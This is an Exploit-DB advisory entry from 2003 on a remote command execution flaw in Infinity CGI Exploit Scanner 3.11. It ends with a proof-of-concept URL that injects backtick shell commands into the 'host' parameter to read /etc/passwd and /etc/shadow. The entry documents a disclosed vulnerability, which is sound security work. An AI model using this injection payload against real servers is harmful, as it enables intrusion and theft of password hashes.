Infinity CGI Exploit Scanner 3.11 - Remote Command Execution Vulnerability

2003-06-12T00:00:00
ID EDB-ID:22772
Type exploitdb
Reporter badpack3t
Modified 2003-06-12T00:00:00

Description

Infinity CGI Exploit Scanner 3.11 Remote Command Execution Vulnerability. Webapps exploit for cgi platform

                                        
                                            source: http://www.securityfocus.com/bid/7913/info

Infinity CGI Exploit Scanner is prone to a remote command execution vulnerability. This is due to insufficient sanitization of input supplied via URI parameters. Exploitation could allow for execution of commands with the privileges of the web server process.

http://www.example.com/cgi-bin/nph-exploitscanget.cgi?host=`cat%20/etc/passwd``
cat%20/etc/shadow`&port=80&errchk=0&idsbypass=0